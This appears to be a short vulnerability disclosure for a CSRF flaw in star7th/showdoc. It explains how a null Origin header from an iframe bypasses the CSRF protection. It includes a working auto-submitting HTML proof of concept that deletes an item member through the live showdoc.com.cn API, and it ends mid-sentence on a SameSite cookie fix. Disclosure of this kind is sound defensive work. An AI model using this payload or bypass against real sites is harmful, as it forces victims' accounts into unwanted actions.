Cross-Site Request Forgery (CSRF) in star7th/showdoc
Sep 6th 2021
With CSRF vulnerability Attacker able to delete any member to of any item if users visit attacker website.
We can bypass the CSRF Protection if we put our payload on a iframe or a html file and send them to victim as after that the Origin header will be set to
null and we can bypass CSRF protection.
🕵️♂️ Proof of Concept
1.Open the PoC.html In Firefox or safari.
2.now you can check that member with email address
test that already registered before for item with item_id
1531601670203344 will be deleted.
<html> <body> <script>history.pushState('', '', '/')</script> <form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/delete" method="POST"> <input type="hidden" name="item_id" value="1531601670203344" /> <input type="hidden" name="item_member_id" value="187133" /> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
This vulnerability is capable of reveal any item.
Set SameSite attribute of cookies to